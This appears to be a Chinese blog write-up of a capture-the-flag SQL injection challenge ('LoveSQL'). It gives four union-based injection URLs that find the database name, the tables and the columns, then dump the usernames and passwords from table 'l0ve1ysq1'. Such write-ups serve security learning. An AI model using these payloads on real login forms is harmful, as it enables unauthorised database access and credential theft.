抱歉,您的浏览器无法访问本站

本页面需要浏览器支持(启用)JavaScript


了解详情 >

上图~~~

哇,该死的我看到tip就知道该怎么做了。不罗嗦,直接查数据库。上图先试了下二次注入,然后就是试不下去了,直接查吧!试了试发现其中有过滤机制。

先查库:?username=admin&password=ad'%20union%20select%201,database(),2%23

LoveSQL3

发现在geek

接下来查表:?username=admin&password=ad'%20union%20select%201,2,concat(table_name)%20from%20information_schema.tables%20where%20table_schema='geek'%23

LoveSQL4

推断flag在l0ve1ysq1里面

查字段:?username=admin&password=ad'%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name='l0ve1ysq1'%23

发现里面有idusernamepassword

这里直接查字段的值:?username=admin&password=ad'%20union%20select%201,2,group_concat(concat(0x7e,username,password))%20from%20geek.l0ve1ysq1%23

LoveSQL5

得到flag。

注意:上述中where后面单引号里的内容在我的操作下化为了十六进制

评论